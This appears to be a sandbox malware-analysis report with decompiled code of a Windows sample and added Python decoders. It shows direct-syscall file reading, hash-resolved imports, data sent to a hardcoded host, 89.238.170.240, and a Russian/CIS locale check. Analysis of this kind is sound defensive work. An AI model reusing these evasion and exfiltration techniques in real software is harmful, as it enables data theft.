                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CountCreateCriticalErrorInitializeLastMutexSectionSpin
                                                  • String ID: $$$d.log$- OperationSystem: %d:%d:%d$@$@Mqt$e9ad4a13-a667-4534-bcfa-4791968c5e00$kernel32$shell32$test1
                                                  • API String ID: 2005177960-2746403547
                                                  • Opcode ID: 97a95da1d7f2aec5c68b4eba05d5da982b444bd723b1dfc14bd941f8863a29f7
                                                  • Instruction ID: 85ae4615496991be6fec230c986a42c8ef5a0d94429a833bfc086e3c78ff9e52
                                                  • Opcode Fuzzy Hash: 97a95da1d7f2aec5c68b4eba05d5da982b444bd723b1dfc14bd941f8863a29f7
                                                  • Instruction Fuzzy Hash: 27C13930904244AEE710AFA0DE0ABAD7B75AF54305F10407EF641BA2E2DFB91A45CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 73%
                                                  			E00404186(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                  				intOrPtr _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				signed int _v20;
                                                  				intOrPtr _v24;
                                                  				char _v28;
                                                  				char _v36;
                                                  				char _v44;
                                                  				signed int _v48;
                                                  				signed int _v52;
                                                  				intOrPtr _v56;
                                                  				char* _v60;
                                                  				signed int _v64;
                                                  				char _v68;
                                                  				intOrPtr _v84;
                                                  				char _v92;
                                                  				signed int _t68;
                                                  				intOrPtr _t74;
                                                  				signed int _t77;
                                                  				signed int _t83;
                                                  				signed int _t89;
                                                  				intOrPtr _t94;
                                                  				intOrPtr _t102;
                                                  				intOrPtr _t107;
                                                  				intOrPtr _t108;
                                                  				intOrPtr _t114;
                                                  
                                                  				_v20 = _v20 & 0x00000000;
                                                  				if((E0040402B(_a4) & 0x000000ff) != 1) {
                                                  					L9:
                                                  					return _v20;
                                                  				}
                                                  				_v16 = E004034F0(0x208);
                                                  				_t125 = _v16;
                                                   				if(_v16 == 0) {
                                                   					L8:
                                                   					E0040351E(_v16);                                    // common exit: free the path buffer
                                                   					goto L9;
                                                   				}
                                                   				E004035E8(_t125, _v16, L"\\??\\%s", _a4);            // format the NT-native path "\??\<_a4>"
                                                   				E00404010( &_v36, _v16, _t125);                       // _v36: UNICODE_STRING over that path
                                                   				_v12 = _v12 & 0x00000000;                             // _v12: handle out-parameter
                                                   				E0040355E( &_v28, 0, 8);                              // _v28: IO_STATUS_BLOCK (8 bytes on x86)
                                                   				_v68 = 0x18;                                          // OBJECT_ATTRIBUTES.Length = 0x18
                                                   				_v64 = _v64 & 0x00000000;                             //   .RootDirectory = NULL
                                                   				_v56 = 0x40;                                          //   .Attributes = OBJ_CASE_INSENSITIVE
                                                   				_v60 =  &_v36;                                        //   .ObjectName = &UNICODE_STRING
                                                   				_v52 = _v52 & 0x00000000;                             //   .SecurityDescriptor = NULL
                                                   				_v48 = _v48 & 0x00000000;                             //   .SecurityQualityOfService = NULL
                                                   				EnterCriticalSection(0x4084d4);                       // one shared stub, so every call is serialised
                                                   				_t68 = 2;
                                                   				_t23 = 0x4084c0 + _t68 * 0; // 0xf0006                // 16-bit syscall-number table at 0x4084c0, slot 0
                                                   				_t102 =  *0x4080b4; // 0xed0000                       // pointer to the shared syscall stub
                                                   				 *(_t102 + 1) =  *_t23 & 0x0000ffff;                  // patch the number into the stub at +1 (consistent with the imm32 of a mov eax; the stub bytes are not in this listing)
                                                   				_t74 =  *0x4080b4( &_v12, 0x100001,  &_v68,  &_v28, 0, 0x80, 7, 1, 0x60, 0, 0); // executed
                                                   				                                                      // 11 args, shape of NtCreateFile: DesiredAccess FILE_READ_DATA|SYNCHRONIZE,
                                                   				                                                      // FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ|WRITE|DELETE, FILE_OPEN,
                                                   				                                                      // FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE
                                                   				_v8 = _t74;
                                                   				LeaveCriticalSection(0x4084d4);
                                                   				if(_v8 < 0) {                                         // NTSTATUS failure
                                                   					goto L8;
                                                   				}
                                                   				E0040355E( &_v92, 0, 0x18);                           // _v92: 0x18-byte FILE_STANDARD_INFORMATION
                                                   				E0040355E( &_v28, 0, 8);
                                                   				EnterCriticalSection(0x4084d4);
                                                   				_t77 = 2;
                                                   				_t32 = 0x4084c0 + _t77 * 3; // 0xf0006                // table slot 3
                                                   				_t107 =  *0x4080b4; // 0xed0000
                                                   				 *(_t107 + 1) =  *_t32 & 0x0000ffff;
                                                   				_v8 =  *0x4080b4(_v12,  &_v28,  &_v92, 0x18, 5);      // 5 args, shape of NtQueryInformationFile(h, iosb, buf, 0x18, FileStandardInformation)
                                                   				LeaveCriticalSection(0x4084d4);
                                                   				if(_v8 >= 0) {
                                                   					_v20 = E004034F0(_v84 + 2);                         // heap-allocate EndOfFile.LowPart (+8 into the struct) + 2
                                                   					if(_v20 != 0) {
                                                   						asm("xorps xmm0, xmm0");
                                                   						asm("movlpd [ebp-0x28], xmm0");                   // zero an 8-byte LARGE_INTEGER
                                                   						E0040355E( &_v28, 0, 8);
                                                   						EnterCriticalSection(0x4084d4);
                                                   						_t89 = 2;
                                                   						_t43 = (_t89 << 0) + 0x4084c0; // 0xf0006         // table slot 1
                                                   						_t114 =  *0x4080b4; // 0xed0000
                                                   						 *(_t114 + 1) =  *_t43 & 0x0000ffff;
                                                   						_t94 =  *0x4080b4(_v12, 0, 0, 0,  &_v28, _v20, _v84,  &_v44, 0); // executed
                                                   						                                                  // 9 args, shape of NtReadFile(h, NULL, NULL, NULL, iosb, buf, len, &ByteOffset, NULL)
                                                   						_v8 = _t94;
                                                   						LeaveCriticalSection(0x4084d4);
                                                   						if(_v8 >= 0) {
                                                   							 *_a8 = _v24;                                  // IO_STATUS_BLOCK.Information (bytes read) to the caller
                                                   						}
                                                   					}
                                                   				}
                                                   				EnterCriticalSection(0x4084d4);
                                                   				_t83 = 2;
                                                   				_t54 = (_t83 << 1) + 0x4084c0; // 0xf0006             // table slot 2
                                                   				_t108 =  *0x4080b4; // 0xed0000
                                                   				 *(_t108 + 1) =  *_t54 & 0x0000ffff;
                                                   				 *0x4080b4(_v12); // executed                         // 1 arg, shape of NtClose(h)
                                                   				LeaveCriticalSection(0x4084d4);
                                                   				goto L8;
                                                   			}

                                                   Statement addresses as shown beside the decompilation, in listing order:
                                                   0x0040418c 0x0040419e 0x00404393 0x00404399 0x00404399 0x004041ae 0x004041b1 0x004041b5
                                                   0x0040438b 0x0040438e 0x00000000 0x0040438e 0x004041c6 0x004041d4 0x004041d9 0x004041e4
                                                   0x004041ea 0x004041f1 0x004041f5 0x004041ff 0x00404202 0x00404206 0x0040420f 0x00404217
                                                   0x0040421b 0x00404222 0x00404228 0x0040424d 0x00404253 0x0040425b 0x00404265 0x00000000
                                                   0x00000000 0x00404272 0x0040427f 0x0040428a 0x00404292 0x00404296 0x0040429d 0x004042a3
                                                   0x004042bb 0x004042c3 0x004042cd 0x004042dd 0x004042e4 0x004042e6 0x004042e9 0x004042f5
                                                   0x00404300 0x00404308 0x0040430c 0x00404313 0x00404319 0x00404335 0x0040433b 0x00404343
                                                   0x0040434d 0x00404355 0x00404355 0x0040434d 0x004042e4 0x0040435c 0x00404364 0x00404367
                                                   0x0040436e 0x00404374 0x0040437a 0x00404385 0x00000000

                                                  APIs
                                                    • Part of subcall function 0040402B: GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 0040420F
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 0040425B
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 0040428A
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 004042C3
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 00404300
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 00404343
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 0040435C
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 00404385
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Heap$AllocateAttributesFileProcess
                                                  • String ID: @$\??\%s
                                                  • API String ID: 4065952465-3277924498
                                                  • Opcode ID: b4b8b1fcaaceb9357a8479c2bfe7e70250756f5cf0e697e41a6ab527b82701fd
                                                  • Instruction ID: 81f4aeba07127441b735290afecc171b038b89b4d282d6fbbf4a3dc81e75b50f
                                                  • Opcode Fuzzy Hash: b4b8b1fcaaceb9357a8479c2bfe7e70250756f5cf0e697e41a6ab527b82701fd
                                                  • Instruction Fuzzy Hash: CE518E71D40209AFEB04DF90DE4ABADBBB5FB44305F10813AFA41BA1D1DBB56A45CB48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
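The function above patches a 16-bit value into one shared stub at offset +1 and then calls that stub four times with 11, 5, 9 and 1 arguments. The immediates it passes (0x100001, an 0x18-byte OBJECT_ATTRIBUTES with Attributes 0x40, share mode 7, disposition 1, create options 0x60, an 0x18-byte buffer for information class 5, and a read buffer of EndOfFile + 2 bytes) match NtCreateFile, NtQueryInformationFile, NtReadFile and NtClose. The Python below is an added example, not code from the sample or from the report: it models the stub as a `mov eax, imm32` prefix (an assumption; the stub's own bytes are not in the listing), decodes those immediates with the public ntifs.h constants, and replays the four calls with the slot indices the listing computes from 0x4084c0 + 2*k. The SSN table contents, the ObjectName pointer and the file-information buffer are constructed for the example, not taken from the memory dump.

```python
import struct

# ---- the shared stub: *(stub + 1) = table[slot] & 0xffff; then call stub(...) ----
class SharedSyscallStub:
    """Models the pointer at 0x4080b4 and the 16-bit table at 0x4084c0."""

    def __init__(self, ssn_table):
        self.table = list(ssn_table)                     # constructed SSNs, not the dump's
        self.code = bytearray(b"\xb8\x00\x00\x00\x00")   # mov eax, imm32 (assumed stub prefix)
        self.log = []                                    # (eax at entry, argc) per call

    def call(self, slot, *args):
        ssn = self.table[slot] & 0xFFFF
        self.code[1:3] = struct.pack("<H", ssn)          # the two-byte write at +1 seen in the listing
        eax = struct.unpack_from("<I", self.code, 1)[0]  # what the stub loads before the transition
        self.log.append((eax, len(args)))
        return eax

# For the four call shapes in this listing only: argument count -> Nt* prototype.
NT_BY_ARGC = {11: "NtCreateFile", 5: "NtQueryInformationFile", 9: "NtReadFile", 1: "NtClose"}

def name_calls(log):
    return [NT_BY_ARGC[argc] for _, argc in log]

# ---- ntifs.h constants used to decode the immediates in the listing ----------------
ACCESS = {0x1: "FILE_READ_DATA", 0x2: "FILE_WRITE_DATA", 0x80: "FILE_READ_ATTRIBUTES",
          0x20000: "READ_CONTROL", 0x100000: "SYNCHRONIZE", 0x80000000: "GENERIC_READ"}
OBJ_ATTR = {0x2: "OBJ_INHERIT", 0x40: "OBJ_CASE_INSENSITIVE", 0x200: "OBJ_KERNEL_HANDLE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = ["FILE_SUPERSEDE", "FILE_OPEN", "FILE_CREATE", "FILE_OPEN_IF",
               "FILE_OVERWRITE", "FILE_OVERWRITE_IF"]
CREATE_OPTS = {0x1: "FILE_DIRECTORY_FILE", 0x10: "FILE_SYNCHRONOUS_IO_ALERT",
               0x20: "FILE_SYNCHRONOUS_IO_NONALERT", 0x40: "FILE_NON_DIRECTORY_FILE",
               0x1000: "FILE_DELETE_ON_CLOSE"}

def decode_mask(value, table):
    """Known flag names in ascending bit order; leftover bits are kept as hex, not dropped."""
    known = [bit for bit in sorted(table) if value & bit]
    rest = value & ~sum(known)
    return [table[bit] for bit in known] + ([f"0x{rest:x}"] if rest else [])

def decode_object_attributes(raw):
    """32-bit OBJECT_ATTRIBUTES: Length, RootDirectory, ObjectName, Attributes,
    SecurityDescriptor, SecurityQualityOfService -- the six dwords _v68.._v48."""
    length, root, name, attrs, _sd, _sqos = struct.unpack("<6I", raw)
    if length != 0x18:
        raise ValueError("Length must be sizeof(OBJECT_ATTRIBUTES) == 0x18")
    return {"RootDirectory": root, "ObjectName": name, "Attributes": decode_mask(attrs, OBJ_ATTR)}

def decode_ntcreatefile(args):
    """The 11 arguments in NtCreateFile order (handle out, access, OA, IOSB, ...)."""
    _h, access, oa, _iosb, _alloc, _fattr, share, disp, opts, _ea, _ealen = args
    return {"DesiredAccess": decode_mask(access, ACCESS),
            "ObjectAttributes": decode_object_attributes(oa),
            "ShareAccess": decode_mask(share, SHARE),
            "CreateDisposition": DISPOSITION[disp],
            "CreateOptions": decode_mask(opts, CREATE_OPTS)}

# OBJECT_ATTRIBUTES and argument list as the listing builds them (ObjectName pointer is a placeholder).
LISTING_OA = struct.pack("<6I", 0x18, 0, 0x0019FF00, 0x40, 0, 0)
LISTING_NTCREATEFILE_ARGS = (0, 0x100001, LISTING_OA, b"\0" * 8, 0, 0x80, 7, 1, 0x60, 0, 0)

def decode_listing_ntcreatefile():
    return decode_ntcreatefile(LISTING_NTCREATEFILE_ARGS)

def parse_file_standard_information(raw):
    """FILE_STANDARD_INFORMATION (class 5, 0x18 bytes): EndOfFile is at +8, which is
    the _v84 = _v92 + 8 field the sample sizes its read buffer from."""
    alloc, eof, links, delete_pending, directory = struct.unpack_from("<qqI??", raw)
    return {"AllocationSize": alloc, "EndOfFile": eof, "NumberOfLinks": links,
            "DeletePending": delete_pending, "Directory": directory}

def read_length_for(info):
    """E004034F0(_v84 + 2): only the low dword of EndOfFile is used, plus 2 bytes;
    a file of 4 GiB or more wraps the length."""
    return (info["EndOfFile"] & 0xFFFFFFFF) + 2

def bytes_transferred(iosb):
    """32-bit IO_STATUS_BLOCK {NTSTATUS Status; ULONG_PTR Information}: the 8 bytes
    zeroed at &_v28; *_a8 = _v24 hands Information (bytes read) back to the caller."""
    return struct.unpack("<iI", iosb)

# Constructed sample buffers (not taken from the dump).
SAMPLE_FSI = struct.pack("<qqI??xx", 8192, 5120, 1, False, False)
SAMPLE_IOSB = struct.pack("<iI", 0, 5120)

def walk_listing():
    """Replays the four stub calls with the slot indices computed from 0x4084c0 + 2*k."""
    stub = SharedSyscallStub([0x55, 0x06, 0x0F, 0x11])             # constructed table
    length = read_length_for(parse_file_standard_information(SAMPLE_FSI))
    stub.call(0, *LISTING_NTCREATEFILE_ARGS)                        # slot 0: 0x4084c0 + 2*0
    stub.call(3, 0, b"\0" * 8, b"\0" * 0x18, 0x18, 5)               # slot 3: 0x4084c0 + 2*3
    stub.call(1, 0, 0, 0, 0, b"\0" * 8, 0, length, b"\0" * 8, 0)    # slot 1: (2<<0) + 0x4084c0
    stub.call(2, 0)                                                 # slot 2: (2<<1) + 0x4084c0
    return stub.log
```

Two details of the listing that the model makes explicit: the stub patch is a two-byte write, so only the low 16 bits of each table entry reach EAX, and the read length is the low dword of EndOfFile plus 2, so the allocation at E004034F0(_v84 + 2) leaves room for a terminator and would wrap for a file of 4 GiB or more.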

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 411 405002-40508b call 40439a 414 405094-4050ec 411->414 415 40508d-40508f 411->415 418 4051d0 414->418 419 4050f2-405120 call 404ff6 socket 414->419 416 4051d3-4051d6 415->416 418->416 422 4051c6-4051c9 419->422 423 405126-40513d call 404f64 call 40355e 419->423 422->418 428 40513e-405144 423->428 429 405146-40515b connect 428->429 430 4051b9-4051c2 closesocket 428->430 431 4051ac-4051b7 Sleep 429->431 432 40515d-40517d send 429->432 430->422 431->428 432->431 433 40517f-405199 send 432->433 433->431 434 40519b-4051aa call 40351e 433->434 434->430
                                                  C-Code - Quality: 82%
                                                  			E00405002(intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _v5;
                                                  				intOrPtr _v12;
                                                  				char _v14;
                                                  				char _v15;
                                                  				char _v16;
                                                  				char _v17;
                                                  				char _v18;
                                                  				char _v19;
                                                  				char _v20;
                                                  				char _v21;
                                                  				char _v22;
                                                  				char _v23;
                                                  				char _v24;
                                                  				char _v25;
                                                  				char _v26;
                                                  				char _v27;
                                                  				char _v28;
                                                  				char _v30;
                                                  				char _v31;
                                                  				char _v32;
                                                  				char _v33;
                                                  				char _v34;
                                                  				char _v35;
                                                  				char _v36;
                                                  				char _v37;
                                                  				char _v38;
                                                  				char _v39;
                                                  				char _v40;
                                                  				signed int _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				intOrPtr _v72;
                                                  				intOrPtr _v76;
                                                  				char _v80;
                                                  				char _v92;
                                                  				short _v94;
                                                  				char _v96;
                                                  				char _v496;
                                                  				signed char _t74;
                                                  				signed int _t77;
                                                  				short _t81;
                                                  				signed int _t84;
                                                  				signed int _t87;
                                                  				signed int _t93;
                                                  				signed int _t97;
                                                  				signed int _t101;
                                                  				signed int _t106;
                                                  				intOrPtr _t116;
                                                  				void* _t120;
                                                  
                                                   				_v80 = 0xa0f5fc93;                   // nine 32-bit API-name hashes, resolved from ws2_32.dll
                                                   				_v76 = 0x5e568bb;                    // by E0040439A below (the hash routine is not in this listing)
                                                   				_v72 = 0x74cff91f;
                                                   				_v68 = 0xa7733acd;
                                                   				_v64 = 0x59d852ad;
                                                   				_v60 = 0xa5c6d777;
                                                   				_v56 = 0x377545a2;
                                                   				_v52 = 0x8e3398bc;
                                                   				_v48 = 0xed514704;
                                                   				_v44 = _v44 & 0x00000000;            // list terminator
                                                   				_v40 = 0x77;                         // stack string "ws2_32.dll", one byte per store
                                                   				_v39 = 0x73;
                                                   				_v38 = 0x32;
                                                   				_v37 = 0x5f;
                                                   				_v36 = 0x33;
                                                   				_v35 = 0x32;
                                                   				_v34 = 0x2e;
                                                   				_v33 = 0x64;
                                                   				_v32 = 0x6c;
                                                   				_v31 = 0x6c;
                                                   				_v30 = 0;
                                                   				_t24 =  &_v40; // 0x77, executed
                                                   				_t74 = E0040439A(_t24,  &_v80); // executed   // resolve the hashed imports (GetModuleHandleA/LoadLibraryA in APIs); returns the count
                                                   				if((_t74 & 0x000000ff) == 9) {       // all nine resolved
                                                   					_v5 = 0;                           // result flag: 1 once both sends succeeded
                                                   					_v28 = 0x38;                       // stack string "89.238.170.240" (the address in the String ID line)
                                                   					_v27 = 0x39;
                                                   					_v26 = 0x2e;
                                                   					_v25 = 0x32;
                                                   					_v24 = 0x33;
                                                   					_v23 = 0x38;
                                                   					_v22 = 0x2e;
                                                   					_v21 = 0x31;
                                                   					_v20 = 0x37;
                                                   					_v19 = 0x30;
                                                   					_v18 = 0x2e;
                                                   					_v17 = 0x32;
                                                   					_v16 = 0x34;
                                                   					_v15 = 0x30;
                                                   					_v14 = 0;
                                                   					_push( &_v496);
                                                   					_push(0x202);
                                                   					_t77 = 4;
                                                   					if( *((intOrPtr*)(_t120 + _t77 * 0 - 0x4c))() != 0) {   // slot 0 of the resolved table, called as (0x202, &wsadata): WSAStartup shape
                                                   						L13:
                                                   						return _v5;
                                                   					}
                                                   					_t81 = 2;
                                                   					_v96 = _t81;                       // sockaddr_in.sin_family = AF_INET
                                                   					_v94 = E00404FF6(0x8b3);           // sin_port from 0x8b3 (port 2227 if E00404FF6 is htons; that routine is not shown here)
                                                   					_t84 = 4;
                                                   					_v12 =  *((intOrPtr*)(_t120 + (_t84 << 0) - 0x4c))(_v96, 1, 0);   // slot 1: socket(AF_INET, SOCK_STREAM, 0)
                                                   					if(_v12 == 0xffffffff) {           // INVALID_SOCKET
                                                   						L12:
                                                   						_t87 = 4;
                                                   						 *((intOrPtr*)(_t120 + _t87 * 7 - 0x4c))();   // slot 7, no arguments: WSACleanup shape
                                                   						goto L13;
                                                   					}
                                                   					_t52 =  &_v28; // 0x38
                                                   					E00404F64(_t52,  &_v92);           // dotted-quad string -> sin_addr (_v92)
                                                   					_t53 =  &_v28; // 0x38
                                                   					E0040355E(_t53, 0, 0xf);           // wipe the 15-byte address string from the stack after use
                                                   					while((_v5 & 0x000000ff) == 0) {   // retry until both sends succeed; no attempt limit
                                                   						_push(0x10);
                                                   						_push( &_v96);
                                                   						_push(_v12);
                                                   						_t97 = 4;
                                                   						if( *((intOrPtr*)(_t120 + (_t97 << 1) - 0x4c))() == 0xffffffff) {   // slot 2: connect(s, &sockaddr_in, 16)
                                                   							L10:
                                                   							Sleep(0x3e8);              // 1 s, then try again
                                                   							continue;
                                                   						}
                                                   						_push(0);
                                                   						_push( *0x408508 & 0x0000ffff);
                                                   						_push( *0x40850c);
                                                   						_push(_v12);
                                                   						_t101 = 4;
                                                   						if( *((intOrPtr*)(_t120 + _t101 * 3 - 0x4c))() == 0xffffffff) {   // slot 3: send(s, *0x40850c, *0x408508, 0): a global buffer first
                                                   							goto L10;
                                                   						}
                                                   						_push(0);
                                                   						_push(_a8 + 1);
                                                   						_push(_a4);
                                                   						_push(_v12);
                                                   						_t106 = 4;
                                                   						if( *((intOrPtr*)(_t120 + _t106 * 3 - 0x4c))() == 0xffffffff) {   // slot 3 again: send(s, _a4, _a8 + 1, 0): the caller's data, length + 1
                                                   							goto L10;
                                                   						}
                                                   						_t116 =  *0x40850c; // 0xf6e780
                                                   						E0040351E(_t116);              // free the global buffer
                                                   						_v5 = 1;
                                                   						break;
                                                   					}
                                                   					_t93 = 4;
                                                   					 *((intOrPtr*)(_t120 + _t93 * 5 - 0x4c))(_v12);   // slot 5: closesocket(s)
                                                   					goto L12;
                                                   				}
                                                   				return 0;
                                                   			}

                                                   Statement addresses as shown beside the decompilation, in listing order:
                                                   0x0040500b 0x00405012 0x00405019 0x00405020 0x00405027 0x0040502e 0x00405035 0x0040503c
                                                   0x00405043 0x0040504a 0x0040504e 0x00405052 0x00405056 0x0040505a 0x0040505e 0x00405062
                                                   0x00405066 0x0040506a 0x0040506e 0x00405072 0x00405076 0x0040507d 0x00405080 0x0040508b
                                                   0x00405094 0x00405098 0x0040509c 0x004050a0 0x004050a4 0x004050a8 0x004050ac 0x004050b0
                                                   0x004050b4 0x004050b8 0x004050bc 0x004050c0 0x004050c4 0x004050c8 0x004050cc 0x004050d0
                                                   0x004050da 0x004050db 0x004050e2 0x004050ec 0x004051d0 0x00000000 0x004051d0 0x004050f4
                                                   0x004050f5 0x00405102 0x00405111 0x00405119 0x00405120 0x004051c6 0x004051c8 0x004051cc
                                                   0x00000000 0x004051cc 0x00405129 0x0040512c 0x00405135 0x00405138 0x0040513e 0x00405146
                                                   0x0040514b 0x0040514c 0x00405151 0x0040515b 0x004051ac 0x004051b1 0x00000000 0x004051b1
                                                   0x0040515d 0x00405166 0x00405167 0x0040516d 0x00405172 0x0040517d 0x00000000 0x00000000
                                                   0x0040517f 0x00405185 0x00405186 0x00405189 0x0040518e 0x00405199 0x00000000 0x00000000
                                                   0x0040519b 0x004051a1 0x004051a6 0x00000000 0x004051a6 0x004051be 0x004051c2 0x00000000
                                                   0x004051c2 0x00000000

                                                  APIs
                                                    • Part of subcall function 0040439A: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                    • Part of subcall function 0040439A: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  • socket.WS2_32(?,00000001,00000000), ref: 00405115
                                                  • connect.WS2_32(000000FF,?,00000010), ref: 00405154
                                                  • send.WS2_32(000000FF,00000000,00000000), ref: 00405176
                                                  • send.WS2_32(000000FF,000000FF,00000035,00000000), ref: 00405192
                                                  • closesocket.WS2_32(000000FF), ref: 004051C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: send$HandleLibraryLoadModuleclosesocketconnectsocket
                                                  • String ID: 89.238.170.240$ws2_32.dll
                                                  • API String ID: 2279181061-3342816196
                                                  • Opcode ID: beae2c1e84d0aae0df8846cbd1db5151f5a7bd69fb3d4fa98ba23ecc8af200cf
                                                  • Instruction ID: e01ffa01383210f14aad19b10e0660efb7d8c6087f36a42e14391d519914f28c
                                                  • Opcode Fuzzy Hash: beae2c1e84d0aae0df8846cbd1db5151f5a7bd69fb3d4fa98ba23ecc8af200cf
                                                  • Instruction Fuzzy Hash: 4F51C730C44289EEEB01CBE8D8197EEBF789F15314F14419AE660BE2D1C7B9474ACB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
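The two byte-per-instruction strings in E00405002 above ("ws2_32.dll" and the 89.238.170.240 address from the String ID line) and the 16-bit table in E00401F03 below are the parts of these listings an analyst recovers first, and a decompiler shows both as long runs of `_vN = imm;` stores. The Python below is an added example, not code from the sample or from the report: it parses such stores copied from the two listings, rebuilds the byte strings in frame order (_vN lives at ebp-N, so a string that starts at _vN continues at _v(N-1)), collects the LANGID table, and emulates the UI-language comparison. GetKeyboardLayoutList appears in the E00401F03 graph but that loop body is past the end of this page, so comparing the low word of each HKL the same way is the example's assumption, as are the sample LANGID and HKL values used in the test.

```python
import re

# Lines copied from the E00405002 listing above: a dword hash, a cleared slot, and the
# two stack strings.  Everything else in this block is the example's own code.
LISTING_E00405002 = """
    _v48 = 0xed514704;
    _v44 = _v44 & 0x00000000;
    _v40 = 0x77;  _v39 = 0x73;  _v38 = 0x32;  _v37 = 0x5f;  _v36 = 0x33;
    _v35 = 0x32;  _v34 = 0x2e;  _v33 = 0x64;  _v32 = 0x6c;  _v31 = 0x6c;
    _v30 = 0;
    _v5 = 0;
    _v28 = 0x38;  _v27 = 0x39;  _v26 = 0x2e;  _v25 = 0x32;  _v24 = 0x33;
    _v23 = 0x38;  _v22 = 0x2e;  _v21 = 0x31;  _v20 = 0x37;  _v19 = 0x30;
    _v18 = 0x2e;  _v17 = 0x32;  _v16 = 0x34;  _v15 = 0x30;  _v14 = 0;
"""

# Lines copied from the E00401F03 listing below: ten 16-bit LANGIDs at stride 2,
# plus the unrelated _v12 store that must not be swept into the table.
LISTING_E00401F03 = """
    _v36 = 0x419;  _v34 = 0x422;  _v32 = 0x423;  _v30 = 0x42c;  _v28 = 0x42b;
    _v26 = 0x43f;  _v24 = 0x440;  _v22 = 0x438;  _v20 = 0x428;  _v18 = 0x443;
    _v12 = 0x443;
"""

ASSIGN = re.compile(r"_v(\d+)\s*=\s*(0x[0-9a-fA-F]+|\d+)\s*;")

def parse_stores(listing):
    """_vN -> immediate for plain '_vN = imm;' stores.  '_vN = _vN & 0' clears and
    stores of computed values do not match and are ignored."""
    return {int(n): int(v, 0) for n, v in ASSIGN.findall(listing)}

def stack_strings(stores, min_len=2):
    """Rebuild NUL-terminated ASCII strings from byte-sized stores at consecutive
    frame offsets, reading in address order (descending _vN)."""
    bytes_only = {n: v for n, v in stores.items() if v <= 0xFF}
    seen, found = set(), []
    for start in sorted(bytes_only, reverse=True):
        if start in seen:
            continue
        run, n = [], start
        while n in bytes_only:
            seen.add(n)
            if bytes_only[n] == 0:          # terminator ends the string
                break
            run.append(bytes_only[n])
            n -= 1
        if len(run) >= min_len and all(0x20 <= b < 0x7F for b in run):
            found.append(bytes(run).decode("ascii"))
    return found

def word_table(stores, start, stride=2):
    """16-bit immediates at _vstart, _v(start-stride), ... up to the first gap."""
    values, n = [], start
    while n in stores:
        values.append(stores[n] & 0xFFFF)
        n -= stride
    return values

# Windows LANGID -> locale name for the ten entries in the table.
LANGID_NAMES = {0x419: "ru-RU", 0x422: "uk-UA", 0x423: "be-BY", 0x428: "tg-Cyrl-TJ",
                0x42B: "hy-AM", 0x42C: "az-Latn-AZ", 0x438: "tk-TM", 0x43F: "kk-KZ",
                0x440: "ky-KG", 0x443: "uz-Latn-UZ"}

def locale_check(blocklist, ui_langid, keyboard_layouts=()):
    """Emulates E00401F03: GetUserDefaultUILanguage() is compared with each table
    entry.  Comparing the low word of each HKL from GetKeyboardLayoutList the same
    way is this example's assumption (that loop is past the end of the page).
    Returns the first LANGID that matches, or None."""
    if (ui_langid & 0xFFFF) in blocklist:
        return ui_langid & 0xFFFF
    for hkl in keyboard_layouts:
        if (hkl & 0xFFFF) in blocklist:
            return hkl & 0xFFFF
    return None

def analyse():
    """Runs both parsers over the embedded listing fragments."""
    strings = stack_strings(parse_stores(LISTING_E00405002))
    table = word_table(parse_stores(LISTING_E00401F03), start=36)
    return strings, table, [LANGID_NAMES.get(x, hex(x)) for x in table]
```

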